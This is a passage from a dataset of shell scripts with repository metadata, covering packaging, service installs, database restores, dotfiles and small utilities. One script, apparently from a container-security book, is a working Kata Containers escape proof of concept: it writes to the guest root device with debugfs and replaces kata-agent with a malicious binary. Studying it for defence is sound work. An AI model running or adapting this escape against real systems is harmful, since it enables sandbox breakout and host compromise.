  sudo usermod -aG docker $USER
  sudo systemctl enable docker.service
  sudo systemctl start docker.service
}
setup_base
setup_app
setup_fcitx
setup_docker
LANG=C xdg-user-dirs-gtk-update
| true
|
67205c7d4ed244fd2bb683270a31b20808bc0135
|
Shell
|
stfxecutables/dynamic_loss
|
/apptainer/helper_scripts/prepare_code.sh
|
UTF-8
| 808
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Package the project's source directories into per-directory tarballs
# (excluding __pycache__) and stage them in <project>/prepare for the
# Apptainer build.

SCRIPT_DIR="$( cd -- "$( dirname -- "${BASH_SOURCE[0]:-$0}"; )" &> /dev/null && pwd 2> /dev/null; )";
APPTAINER_ROOT="$(dirname "$SCRIPT_DIR")"
PROJECT="$(dirname "$APPTAINER_ROOT")"
PREP="$PROJECT/prepare"

# Directories to archive; each DIR becomes DIR.tar.
bundles=(run_scripts scripts src test experiments)

cd "$PROJECT" || exit

# Drop stale archives, then rebuild each one.
rm -rf run_scripts.tar scripts.tar src.tar test.tar experiments.tar
for dir in "${bundles[@]}"; do
    tar --exclude="__pycache__" -cvf "$dir.tar" "$dir"
done

# Stage all archives into the prepare directory.
for dir in "${bundles[@]}"; do
    mv "$dir.tar" "$PREP"
done
| true
|
14c1af33187c2b00584b44447df0cdf88c7bdeef
|
Shell
|
wonkarthik/myscripts
|
/sample/yacy.sh
|
UTF-8
| 1,303
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Install/refresh a YaCy search node: replaces distro Java with Oracle JRE 8,
# unpacks YaCy under /opt/yacy, and (re)starts it as the "yacy" user.
# NOTE(review): must run as root; "PASSWORDHERE" below is a placeholder --
# never commit a real password here.
pidof java && kill `pidof java`
grep yacy /etc/passwd || useradd -m -s /bin/bash -d /opt/yacy yacy
# get java8
test -f /etc/ssl/certs/java/cacerts || apt-get install ca-certificates-java -y
apt-get remove default-jre ca-certificates-java openjdk-7-jre openjdk-7-jre-headless -y
apt-get autoremove
cd /opt/
rm -rf java* jre*
wget "http://javadl.oracle.com/webapps/download/AutoDL?BundleId=211989" -O /opt/java8.tar.gz
tar xfvz java8.tar.gz
cd jre1.8*/bin
ln -sfv "`pwd`/java" /usr/bin/java
cd ../lib/security
# Reuse the system CA store so TLS keeps working with the Oracle JRE.
test -f /etc/ssl/certs/java/cacerts && ln -sfv /etc/ssl/certs/java/cacerts "`pwd`/cacerts" || echo "ca-certificates-java not found"
# setup yacy
cd /opt/yacy
test -e DATA || mkdir -v DATA
wget http://yacy.net/release/yacy_v1.90_20160704_9000.tar.gz -O yacy.tar.gz
tar xfvz yacy.tar.gz
cd yacy
# Keep the data dir outside the release tree so upgrades preserve it.
ln -s /opt/yacy/DATA /opt/yacy/yacy/DATA
chmod +x /opt/yacy/yacy/startYACY.sh
chmod +x /opt/yacy/yacy/stopYACY.sh
chmod +x /opt/yacy/yacy/bin/passwd.sh
chown yacy /opt/yacy -R
chmod 700 /opt/yacy
ln -sfv "/opt/yacy/DATA/LOG/yacy00.log" "/opt/yacy/daemon.log"
# start yacy
pidof java || su -c "/opt/yacy/yacy/startYACY.sh" yacy
pidof java || sudo -u yacy /opt/yacy/yacy/startYACY.sh
# set yacy password
/opt/yacy/yacy/bin/passwd.sh PASSWORDHERE
# stop yacy
/opt/yacy/yacy/stopYACY.sh
| true
|
f33d4a517500ad036104e48b273fc3e1c6c8c37b
|
Shell
|
rxxq/CSC209_assignments
|
/practice/largest_file.sh
|
UTF-8
| 282
| 3.578125
| 4
|
[] |
no_license
|
#! /bin/bash
# Print the name of the largest (by byte count) of the files given as
# arguments.  Each filename is echoed as it is examined; the winner is
# printed last.
#
# Usage: largest_file.sh file ...
PATH=/bin:/usr/bin

if test $# -eq 0
then
	echo "usage: $0 file ..." >&2
	exit 1
fi

maxsize=-1
maxname=
for i
do
	# Quoted, so names containing spaces or glob chars print intact.
	echo "$i"
	# Byte count via stdin redirection so wc emits no filename column;
	# skip files we cannot read instead of feeding test an empty operand.
	thissize=`wc -c <"$i"` || continue
	if test "$thissize" -gt "$maxsize"
	then
		maxsize=$thissize
		maxname="$i"
	fi
done
echo "$maxname"
| true
|
c7114c5b02767af6de52907555250dcfe81ef575
|
Shell
|
UniversityOfHelsinkiCS/sis-importer
|
/importer-db-staging-sampletaker/run.sh
|
UTF-8
| 2,921
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build a small "sample" copy of the sis-importer staging database:
# fetch the full dump, restore it into a scratch container, shrink it with
# the sampletaker, then dump the sample.  Interactive (prompts twice).
# Exit on error
set -e
# constants
container="importer-db-staging-copy"   # scratch postgres container name
db="sis-importer-db"                   # database name inside the container
# Get dump from pannu to local env or copy inside pannu
# Prompts l/p: "l" scp's the dump from the importer host (via melkki proxy),
# "p" copies it locally on pannu itself.
get_dump() {
  read -rp "Are you running this locally or in pannu(l/p)?" RUNENV
  pannupath="/home/importer_user/staging/backup/importer-db-staging.sqz"
  if [ "$RUNENV" = "l" ]; then
    # Get db from pannu to current folder
    echo "Enter your Uni Helsinki username:"
    read -r username
    echo "Using your Uni Helsinki username: $username"
    scp -r -o ProxyCommand="ssh -l $username -W %h:%p melkki.cs.helsinki.fi" \
      "$username@importer:$pannupath" importer-db-staging.sqz
  elif [ "$RUNENV" = "p" ]; then
    cp $pannupath .
  else
    echo "Wrong option $RUNENV!"
    exit 1
  fi
}
# Setup function
# Run the given command, retrying up to 60 times with a 10-second pause
# between attempts.  Stops at the first success.  Never fails the caller
# (safe under `set -e`: the final echo/sleep of a failed round succeeds).
retry () {
  local attempt
  for attempt in {1..60}; do
    if "$@"; then
      break
    fi
    echo "Retry attempt $attempt failed, waiting..."
    sleep 10
  done
}
# Drop database $2 inside container $1 (waits until postgres is ready;
# tolerates the database not existing).
drop_psql () {
  echo "Dropping psql in container $1 with db name $2"
  retry docker exec -u postgres "$1" pg_isready --dbname="$2"
  docker exec -u postgres "$1" dropdb "$2" || echo "container $1 DB $2 does not exist"
}
# Recreate database $2 inside container $1 from scratch.
ping_psql () {
  drop_psql "$1" "$2"
  echo "Creating psql in container $1 with db name $2"
  retry docker exec -u postgres "$1" pg_isready --dbname="$2"
  docker exec -u postgres "$1" createdb "$2" || echo "container $1 DB $2 already exists"
}
# Restore dump file $1 into container $2, database $3 (4 parallel jobs).
restore_psql_from_backup () {
  echo ""
  echo "Restoring database from backup ($1/$2):"
  echo "  1. Copying dump..."
  docker cp "$1" "$2:/asd.sqz"
  echo "  2. Writing database..."
  docker exec "$2" pg_restore -U postgres --no-owner -F c --dbname="$3" -j4 /asd.sqz
}
# Bring up the scratch container and load the full staging dump into it.
setup_db () {
  docker-compose up -d "$container"
  drop_psql "$container" "$db"
  ping_psql "$container" "$db"
  restore_psql_from_backup importer-db-staging.sqz "$container" "$db"
  # Run analyze to ensure postgres query optimizer has needed info
  docker exec "$container" psql -U postgres "$db" -c 'ANALYZE;'
}
# Shrink the restored DB to a sample (dry-run first, then confirm) and dump it.
create_sample () {
  # Ensure that newest version of sampletaker is used
  docker-compose build importer-db-staging-sampletaker
  # Run sampletaker: first dry-run, then confirm
  docker-compose run --rm importer-db-staging-sampletaker
  read -rp "Create sample by nuking extra stuff from db(y/n)?" CREATE
  if [ "$CREATE" != "y" ]; then
    exit 0
  fi
  docker-compose run --rm -e DESTROY=TRUE importer-db-staging-sampletaker
  # Vacuum the sample database
  docker exec "$container" psql -U postgres "$db" -c 'VACUUM FULL;'
  # Finally create dump that contains only the new sample
  docker exec -i "$container" pg_dump -Fc -U postgres "$db" > sis-importer-db.sqz
}
# Remove the source dump and tear down all compose services/volumes/images.
cleanup () {
  # Remove original dump
  rm importer-db-staging.sqz
  # Run down services
  docker-compose down --rmi all --volumes --remove-orphans
}
# run script in phases, comment out phase if need to debug
get_dump
setup_db
create_sample
cleanup
| true
|
ea7fc3ca7fd54872ba89a3c020fcbe27941199a8
|
Shell
|
boti-li/cloud-native-security-book
|
/code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh
|
UTF-8
| 997
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
# PoC (from the cloud-native-security book): escape a Kata/Cloud Hypervisor
# sandbox by writing directly to the guest's root block device and replacing
# /usr/bin/kata-agent with a malicious binary via debugfs.  Research use only.
set -e
echo -e "\t[+] In the evil container"
echo -e "\t[*] Searching for the device..."
found_clh_dev=false
# Scan sysfs block-device links for one whose target name contains "vda1"
# (the CLH guest rootfs); the link name itself is the major:minor pair.
for path in /sys/dev/block/* ; do
    curr_target=$(readlink $path)
    if [[ $curr_target == *"vda1"* ]]; then
        dev=$(basename $path)
        guest_fs_major=$(echo $dev | cut -f1 -d:)
        guest_fs_minor=$(echo $dev | cut -f2 -d:)
        found_clh_dev=true
        break
    fi
done
if [ "$found_clh_dev" = false ]; then
    echo -e "\t[!] no vda1 device, not on CLH, shutting down..."
    exit 1
fi
echo -e "\t[+] Device found"
echo -e "\t[*] Mknoding..."
# Create a device node pointing at the guest rootfs block device.
mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor
echo -e "\t[+] Mknoded successfully"
# Ok we're on CLH, let's run the attack
echo -e "\t[*] Replacing the guest kata-agent..."
cmd_file=/tmp/debugfs_cmdfile
rm -rf $cmd_file
# debugfs command script: open the device read-write, replace the agent
# binary in-place, then close flushing changes (-a).
cat <<EOF > $cmd_file
open -w /dev/guest_hd
cd /usr/bin
rm kata-agent
write /evil-kata-agent kata-agent
close -a
EOF
# Execute cmdfile
/sbin/debugfs -f $cmd_file
echo -e "\t[+] Done"
| true
|
0b8746bcc479e571124aea7e8a634f65eaf28b77
|
Shell
|
fteychene/dokku-alt
|
/plugins/dokku-postgresql/pre-delete
|
UTF-8
| 512
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# dokku-postgresql pre-delete hook: before an app is destroyed, revoke its
# database privileges, drop its postgres role, and remove its link/password
# files.  Relies on vars/helpers (APP, DB_*, verify_app_name, pgsql_admin)
# defined by the sourced "vars" file.
source "$(dirname $0)/vars"

verify_app_name "$1"

DB_LINKS="$DB_APP_DATABASES$APP/"
DB_APP_PASSWORD="$DB_APP_PASSWORDS$APP"

# Revoke all privileges
# One entry per linked database; `|| true` keeps the hook best-effort.
[[ ! -d "$DB_LINKS" ]] || ls -1 "$DB_LINKS" | while read DB_NAME; do
    pgsql_admin <<EOF || true
REVOKE ALL PRIVILEGES ON DATABASE "$DB_NAME" FROM "$APP";
EOF
done

# Drop user
if [[ -f "$DB_APP_PASSWORD" ]] || [[ -d "$DB_LINKS" ]]; then
    pgsql_admin <<EOF || true
DROP USER IF EXISTS "$APP";
EOF
fi

rm -rf "$DB_LINKS" "$DB_APP_PASSWORD"
| true
|
32766e6c461abd898f439e3a1209591da00c2499
|
Shell
|
jgrocho/dot-files
|
/xinitrc
|
UTF-8
| 1,516
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# ~/.xinitrc
#
# Executed by startx (run your window manager from here)
#
# NOTE: shebang changed from /bin/sh to /bin/bash -- this file uses
# bash-only features ([[ ]], arrays) that fail under dash/POSIX sh.

# Source the system-wide xinitrc drop-ins, if any.
if [[ -d /etc/X11/xinit/xinitrc.d ]]; then
  for f in /etc/X11/xinit/xinitrc.d/*; do
    [[ -x "$f" ]] && . "$f"
  done
  unset f
fi

# Set the cursor (XMonad does not set one by default)
xsetroot -cursor_name left_ptr

# Set screen layout based on hostname
case "$HOSTNAME" in
  qubert) xrandr --output LVDS1 --auto --primary --output VGA1 --auto --above LVDS1 ;;
  theia) xrandr --output HDMI-0 --auto --primary ;;
esac

# User systemd services to start for this session.
declare units=(
  xresources
  fehbg
  urxvtd
  unclutter
  redshift@0
  redshift@1
  xautolock
)
systemctl --user start "${units[@]}"

# Start the VirtualBox guest additons
hash VBoxClient-all 2>/dev/null && { VBoxClient-all & }

# Start arbtt to collect statistics about window usage
[[ -f ~/.arbtt/.virthualenv/bin/activate ]] \
  && (source ~/.arbtt/.virthualenv/bin/activate \
    && arbtt-capture &)

# TrackPoint: emulate a scroll wheel with the middle button + stick.
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation" 1
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Button" 2
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Timeout" 200
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Axes" 6 7 4 5
xinput set-prop "TPPS/2 IBM TrackPoint" "Device Accel Constant Deceleration" 0.95

# xmonad is not a reparenting window manager, tell java
export _JAVA_AWT_WM_NONREPARENTING=1

# Start xmonad from the user's binary just in case anything ever happens to
# xmonad (e.g. is uninstalled)
exec ~/.local/bin/xmonad
| true
|
e41e0c8bed7c9a73b5489c304c77c0f25a61f3b6
|
Shell
|
LeCoyote/optware
|
/sources/clutch/postinst
|
UTF-8
| 463
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
# Optware clutch post-install: enable lighttpd's fastcgi support in-place
# and tell the user where to find the web UI.  No-op if lighttpd.conf absent.
CONF=/opt/etc/lighttpd/lighttpd.conf
test -f ${CONF} || exit 0
#uncomment fastcgi module
echo "Enabling fastgi module for lighttp"
sed -i -e '/^#[ \t]*"mod_fastcgi"/s/^#/ /' ${CONF}
#uncomment fastcgi.server
# Branch-based sed program: on the "#fastcgi.server" line jump to :uc, which
# strips the leading "#" from that line and the following lines until one no
# longer starts with "#" (uncommenting the whole block).
sed -i -e '/^#fastcgi.server/b uc;b;:uc;s/^#//;n;s/^#//;t uc' ${CONF}
# Extract the configured server.port number for the final hint.
SERVER_PORT=$(sed -ne 's/server.port.*=[ \t]*\+\([0-9]\{1,\}\)/\1/p'\
 /opt/etc/lighttpd/lighttpd.conf)
echo "Point your browser to http://server.ip:${SERVER_PORT}/clutch"
| true
|
af77d14bc04d497b3d277b2e8a0ec44fc6c1f365
|
Shell
|
Fonmon/Fondo-DevOps
|
/environment/scripts/restore_env
|
UTF-8
| 1,132
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Restore the Fonmon environment from a recovery tarball: letsencrypt certs,
# app config files, front-end assets, and the newest database dump.
# Requires /etc/environment to define HOME_FONMON, USER_FONMON, GROUP_FONMON.
set -x
if [ $# -ne 1 ]; then
    echo 'Arguments: recovery_file'
    exit 1
fi
source /etc/environment
RECOVERY_FILE=$1
cd $HOME_FONMON
tar -xzf $RECOVERY_FILE
# letsencrypt
# Restore certs, then copy the live PEMs into the app's certificate dirs:
# the directory whose name contains "api" feeds certificates/api, the other
# feeds certificates/web.
cp -r recovery_files/letsencrypt/* /etc/letsencrypt
chown -R root:root /etc/letsencrypt
cd $(find /etc/letsencrypt/live/* -type d -name "*api*")
cp *.pem $HOME_FONMON/certificates/api
cd $(find /etc/letsencrypt/live/* -type d ! -name "*api*")
cp *.pem $HOME_FONMON/certificates/web
chown -R $USER_FONMON:$GROUP_FONMON $HOME_FONMON/certificates
cd $HOME_FONMON
# Fonmon files
cp recovery_files/fonmon/.env recovery_files/fonmon/fonmon-storage-credentials.json deploy/
cp -r recovery_files/fonmon/front/* front/
# Restore DB
# Pick the newest dump (reverse-sorted filenames) and load it into the
# freshly started fondodb container.
DUMPS=($(ls recovery_files/fonmon/dumps/ | sort -r))
DUMP_DB="$(pwd)/recovery_files/fonmon/dumps/${DUMPS[0]}"
cd deploy/
source .env
mkdir Fondo-API Fondo-Web Fondo-MNS
docker-compose up -d fondodb
sleep 10
docker exec -i fondo_db psql -Ufondouser -d $POSTGRES_DATABASE < $DUMP_DB
# Tear down
cd $HOME_FONMON && rm -rf recovery_files $RECOVERY_FILE
rm -rf deploy/Fondo-API deploy/Fondo-Web deploy/Fondo-MNS
|
035e760c029cfe5b3fabe55f2442d71e7fc441fd
|
Shell
|
7error/docker-harbor
|
/wait-for-postgres.sh
|
UTF-8
| 363
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash -e
# wait-for-postgres.sh
# Adapted from https://docs.docker.com/compose/startup-order/
# Expects the necessary PG* variables.
#
# Blocks until the local Postgres accepts connections, then execs the
# remaining command line (this process is replaced by the target command).
set -e  # shebang options are lost when invoked as `bash wait-for-postgres.sh`

until psql -c '\l' -U "postgres" -tw >/dev/null 2>&1; do
  echo >&2 "$(date +%Y%m%dt%H%M%S) Postgres is unavailable - sleeping"
  sleep 4
done

echo >&2 "$(date +%Y%m%dt%H%M%S) Postgres is up - executing command"
# Quoted "$@" preserves each argument intact; the original unquoted ${@}
# re-split any argument containing whitespace.
exec "$@"
| true
|
24c6631ba85945581859ae792c7415c062ddbf55
|
Shell
|
semoho/Linux-Tutorial
|
/students-assignments/1/Assignment 06/calculator.sh
|
UTF-8
| 349
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Tiny interactive calculator: reads two numbers and an operator
# (+ - * / ^ %) and prints the result computed by bc.
# Division is evaluated with 5 decimal places of precision.
echo "Enter Two numbers: "
read a
read b
echo "Enter Operation: "
read ch
case $ch in
  +)  res=$(echo $a + $b | bc) ;;
  -)  res=$(echo $a - $b | bc) ;;
  \*) res=$(echo $a \* $b | bc) ;;
  /)  res=$(echo "scale=5;$a / $b" | bc) ;;
  ^)  res=$(echo $a ^ $b | bc) ;;
  %)  res=$(echo $a % $b | bc) ;;
esac
echo "Result: $res"
| true
|
75417fc48314ffa3c5ac79f080c33f7bdabca034
|
Shell
|
BackupTheBerlios/projectdev
|
/oldtree/current/base/cpio/PKGBUILD
|
UTF-8
| 609
| 2.78125
| 3
|
[] |
no_license
|
# $Id: PKGBUILD,v 1.1 2004/11/02 13:04:40 dpb Exp $
# Maintainer: judd <jvinet@zeroflux.org>
# Arch-style PKGBUILD for GNU cpio; built by makepkg, which supplies
# $startdir and runs build() in a clean environment.
pkgname=cpio
pkgver=2.5
pkgrel=4
pkgdesc="A tool to copy files into or out of a cpio or tar archive"
url="http://www.gnu.org/software/cpio"
depends=('bash')
source=(ftp://ftp.gnu.org/gnu/cpio/cpio-$pkgver.tar.gz)

build() {
  cd $startdir/src/$pkgname-$pkgver
  ./configure --prefix=/
  make || return 1
  make prefix=$startdir/pkg install
  # Relocate man pages under /usr and drop the mt tool plus libexec/info
  # (mt is shipped by a separate package).
  mkdir $startdir/pkg/usr
  mv $startdir/pkg/man $startdir/pkg/usr
  rm -f $startdir/pkg/bin/mt $startdir/pkg/usr/man/man1/mt.1
  rm -rf $startdir/pkg/libexec
  rm -rf $startdir/pkg/info
}
| true
|
939c2613c55d62a4f87953cf47bc56d558d43cf2
|
Shell
|
syranez/.bash
|
/alias
|
UTF-8
| 776
| 3.09375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
#
# aliases
# Sourced from the interactive bash setup; defines cross-platform aliases.

# jshint alias
alias jshint=/usr/lib/node_modules/jshint/bin/hint

# Color flags differ between BSD/macOS (-G) and GNU (--color).
if [[ ${OSTYPE//[0-9.]/} == 'darwin' ]]; then
    alias ls="ls -G"
else
    alias ls='ls --color=auto'
    alias grep='grep --color=auto'
fi

# Print the public IP address.
alias ip='curl ifconfig.me'

# enable per default all Warnings, as recommended by JPL C-Coding-Standard D-60411
# removed stupid legacy stuff -Wtraditional
alias gcc='gcc -Wall -pedantic -std=iso9899:1999 -Wshadow -Wpointer-arith -Wcast-qual -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wconversion'

# fixes "cannot connect to X server " errors
#+ it sets hard DISPLAY to 0.0, exports it and allows local connections.
alias fixX="DISPLAY=:0.0;export DISPLAY;xhost +local:0"

# english man
alias man="LANG=en_US.UTF-8 man"
|
3552cb2efcbf2d8a51b4c395191d5452935fb422
|
Shell
|
kgyang/pi3
|
/buildall.sh
|
UTF-8
| 185
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build (or clean) all sub-projects: common, bcm2835, DHT.
# Usage: buildall.sh [make-target]   e.g. "buildall.sh" or "buildall.sh clean"
TARGET=$1
cd "$(dirname "$0")"

# $TARGET is deliberately unquoted: when empty it must vanish entirely
# rather than become an empty make goal.
make -C common $TARGET && make -C bcm2835 $TARGET && make -C DHT $TARGET
status=$?

# For "clean", also remove the top-level output directories.
# Using `if` rather than `[[ ]] && { }` fixes the original bug where a
# non-clean invocation exited with status 1 (the failed test) even after
# all builds succeeded.
if [[ "$TARGET" == "clean" ]]; then
	cd "$(dirname "$0")"
	rm -rf lib bin
fi
exit $status
| true
|
ac37375a04e367fb0c7ea78b564be4e90a8cbaca
|
Shell
|
rajatk32/Assignments
|
/server-upgrade/deploy-servers
|
UTF-8
| 3,337
| 4.46875
| 4
|
[] |
no_license
|
#!/bin/sh
# script tested on ubuntu
# How the deployment works:
# If a server on the target machine is already running, its process id is extracted
# The server file is copied/replaced with scp command (If the old server was running, it still remains in operational state)
# If the old server was running, it is checked whether any clients are still connected to the server i.e. if there are active connections
# If there are active connections, we wait until the active connections are closed
# Once the active connections are closed, the server is killed using process id retrieved before
# The server is re-started (with the new/upgraded version)
# variables
# NOTE(review): the key path and file locations are machine-specific;
# consider reading them from the environment instead of hardcoding.
username=ubuntu # this is a user who is authorized to update server files, ideally a deploy user should be created in all servers who has permission only to write in the server directory
keypath=/home/rajat/Downloads/obs_aws.pem # common key to be used to perform ssh or scp operations in servers
deployLocation=/home/ubuntu # assuming that all servers are deployed at a common location in different machines
goServerFileLocation=/home/rajat/Downloads/go-server.go
pythonServerFileLocation=/home/rajat/Downloads/python-server.py
luaServerFileLocation=/home/rajat/Downloads/lua-server.lua
goPort=8000
luaPort=8001
pythonPort=8002
# the deploy function takes in 5 parameters (in order):
# 1. process name of server as shown in ps command in linux
# 2. local server file location to copy from
# 3. port no. of the server
# 4. command which is used to run the server for e.g. "go run" is used to run a go server
# 5. file name of the server source file
deploy () {
	# machines stores the list of ip addresses or hostnames on which servers have to be deployed
	if [ "$1" = "python" ];then
		machines=`./get-hostnames python-server`
	elif [ "$1" = "lua" ];then
		machines=`./get-hostnames lua-server`
	elif [ "$1" = "go-server" ];then
		machines=`./get-hostnames go-server`
	fi
	for mach in $machines
	do
		# PID of the currently running server (empty when none is running).
		pid=`ssh -i $keypath $username@$mach pgrep $1`
		`scp -i $keypath $2 $username@$mach:$deployLocation/`
		if [ "$?" -eq "1" ]
		then
			echo "$mach: Upgrade failed, Reason: server file couldn't be replaced"
			continue
		else
			echo "$mach: new server version file copied"
			if [ "$pid" ]
			then
				# Poll every 2s until no ESTABLISHED connection remains
				# on the server's port; print the waiting notice once.
				clientsConnected=1
				i=1
				while [ "$clientsConnected" ]
				do
					clientsConnected=`ssh -f -i $keypath $username@$mach lsof -i:$3 | grep ESTABLISHED`
					if [ "$clientsConnected" ] && [ $i = 1 ]
					then
						echo "$mach: waiting for release of active connections"
						i=$((i+1))
					fi
					sleep 2
				done
				echo "$mach: no active connections: safe to kill"
				`ssh -i $keypath $username@$mach sudo kill $pid`
			fi
			echo "$mach: deploying new server version"
			ssh -f -i $keypath $username@$mach $4 $deployLocation/$5
			echo "$mach: server successfully deployed"
		fi
	done
}
# Dispatch one server-type name ($1) to deploy() with its configuration
# (process name, local file, port, launcher command, remote file name).
run () {
	case "$1" in
		go-server)
			deploy go-server $goServerFileLocation $goPort "go run" go-server.go
			;;
		lua-server)
			deploy lua $luaServerFileLocation $luaPort lua lua-server.lua
			;;
		python-server)
			deploy python $pythonServerFileLocation $pythonPort python python-server.py
			;;
		*)
			echo "invalid case"
			;;
	esac
}

# Deploy each server type named on the command line (up to three).
if [ "$1" ];then
	run $1
	if [ "$2" ];then
		run $2
	fi
	# BUG FIX: was `[ "3" ]` -- a non-empty literal that is always true, so
	# an empty third run() ("invalid case") fired even with 1-2 arguments.
	if [ "$3" ];then
		run $3
	fi
else
	echo "Usage: ./deploy-servers go-server lua-server python-server"
fi
| true
|
c978f6e8b277d6742a7ddddec76916534a27c904
|
Shell
|
brianclements/zsh
|
/zsh.d/colors.zsh
|
UTF-8
| 1,328
| 3.21875
| 3
|
[] |
no_license
|
# zsh color setup: defines PR_* prompt color variables and platform-aware
# ls/grep color aliases.  Sourced from the interactive zsh configuration.
autoload colors; colors

# The variables are wrapped in \%\{\%\}. This should be the case for every
# variable that does not contain space.
# Defines PR_<COLOR> (normal) and PR_BOLD_<COLOR> for each base color.
for COLOR in RED GREEN YELLOW BLUE MAGENTA CYAN BLACK WHITE; do
    eval PR_$COLOR='%{$fg_no_bold[${(L)COLOR}]%}'
    eval PR_BOLD_$COLOR='%{$fg_bold[${(L)COLOR}]%}'
done

eval RESET='$reset_color'
export PR_RED PR_GREEN PR_YELLOW PR_BLUE PR_WHITE PR_BLACK
export PR_BOLD_RED PR_BOLD_GREEN PR_BOLD_YELLOW PR_BOLD_BLUE
export PR_BOLD_WHITE PR_BOLD_BLACK

# Clear LSCOLORS
unset LSCOLORS
export CLICOLOR=1

# Main change, you can see directories on a dark background
#export tLSCOLORS=gxfxcxdxbxegedabagacad
# LS_COLORS is the GNU format, LSCOLORS the BSD format of the same palette.
LS_COLORS="di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32";
LSCOLORS="ExGxFxDxCxDxDxhbhdacEc";
# LSCOLORS=Gxfxcxdxbxegedabagacad # alt
# LS_COLORS=exfxcxdxbxegedabagacad # alt

# Do we need Linux or BSD Style?
if [[ $IS_LINUX -eq 1 ]]; then
    # Linux Style
    export LS_COLORS=$LS_COLORS
    alias ls='ls --color=auto -F'
    alias dir='dir --color=auto'
    alias vdir='vdir --color=auto'
    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
else
    # BSD Style
    export LSCOLORS=$LSCOLORS
    alias ls='ls -G'
fi
|
e50a0caf843ed5187ff15768148e7071514b72e0
|
Shell
|
mgijax/pwi
|
/admin/stopserver.sh
|
UTF-8
| 218
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Stop the pwi production server: find the prodserver.py process bound to
# $SERVER_PORT (from the sourced configuration) and kill it.

if [ "${MGICONFIG}" != "" ]
then
    source "${MGICONFIG}/master.config.sh"
fi
source ../Configuration

PID=$(pgrep -f "prodserver.py --port=$SERVER_PORT")

# Guard against an empty match: the original `kill -9 $PID` with no PID
# produced a kill usage error instead of a clear message.
if [ -z "$PID" ]
then
    printf 'No prodserver.py process found on port %s\n' "$SERVER_PORT" >&2
    exit 1
fi

printf 'Killing process with pid=%s\n' "$PID"
# $PID intentionally unquoted: pgrep may return several PIDs (one per line)
# and word-splitting passes each as a separate kill argument.
kill -9 $PID
|
1a3fdae85c6d871d81cdc1004d1f57138a2b4045
|
Shell
|
firepick1/ArduinoJson
|
/scripts/buildzip
|
UTF-8
| 578
| 3.59375
| 4
|
[
"MIT"
] |
permissive
|
#! /bin/bash
# Build an Arduino-installable zip of ArduinoJson, named after the current
# git commit hash.  Run from inside the ArduinoJson checkout.
echo "SCRIPT : buildzip"
echo "HELP : build zip file for Arduino installation"

# Full hash of HEAD; used to make the archive name unique per commit.
TAG=`git log --pretty=format:'%H' -n 1`
OUTPUT="ArduinoJson-$TAG.zip"

echo "STATUS : creating $OUTPUT"
rm -f $OUTPUT
# Zip from the parent directory so paths inside the archive start with
# "ArduinoJson/"; -x excludes the CMake build file.
pushd .. >& /dev/null
zip -r -q $OUTPUT \
    ArduinoJson/CHANGELOG.md \
    ArduinoJson/examples \
    ArduinoJson/include \
    ArduinoJson/keywords.txt \
    ArduinoJson/LICENSE.md \
    ArduinoJson/README.md \
    ArduinoJson/library.json \
    ArduinoJson/src \
    ArduinoJson/ArduinoJson.h \
    ArduinoJson/ArduinoJson.cpp \
    -x \
    ArduinoJson/src/CMakeLists.txt
popd >& /dev/null
|
411896882b6b0f96fe783390752fc76284522f26
|
Shell
|
eliasdorneles/dotfiles
|
/bin/run-jison.sh
|
UTF-8
| 528
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# Compile a Jison grammar and run the generated parser over the given input
# files (or stdin when none are given).
set -e

error(){ echo "$*"; exit 1; }

[ "x$1" = "x" ] && error """Usage: `basename $0` JISONFILE [INPUTFILE...]
If no INPUTFILEs are provided, the input will be read from STDIN
"""

jisonfile=$1; shift
[ -f "$jisonfile" ] || error "ERROR: File not found: $jisonfile"

outjison=$(mktemp)
tmpfile=$(mktemp)
# Clean up on ANY exit path: under `set -e` a failing jison or node call
# previously skipped the trailing rm and leaked both temp files.
trap 'rm -f "$tmpfile" "$outjison"' EXIT

# generate parser
jison -o "$outjison" "$jisonfile"

# run jison parser with stdin or filenames from arguments
cat "$@" > "$tmpfile"
node "$outjison" "$tmpfile"
|
1ecb03190979ca619310bd7cd297f931c7095419
|
Shell
|
zhangaz1/dotfiles-58
|
/.setup/sync.sh
|
UTF-8
| 210
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Snapshot machine state into the dotfiles: dump Homebrew packages to
# ~/.Brewfile (stripping ", link: false" annotations) and record the list
# of installed VS Code extensions.
set -o errexit
set -o pipefail

_main() {
	# Dump the global Brewfile, then normalize it in place.
	brew bundle --global dump --force && sed -i "s/, link: false//" ~/.Brewfile
	code --list-extensions > "$HOME/.vscode/extensions/list"
}

_main
|
13a9a6199a901df4f14b541617d7fb696dd57c0e
|
Shell
|
ZubairNabi/ciel
|
/scripts/check_space_workers.h
|
UTF-8
| 214
| 3.296875
| 3
|
[
"LicenseRef-scancode-other-permissive",
"ISC"
] |
permissive
|
#!/bin/bash
#SCRIPT: check_space_workers.sh
#PURPOSE: Check space on workers
# Usage: check_space_workers.sh HOSTFILE  (one hostname per line).
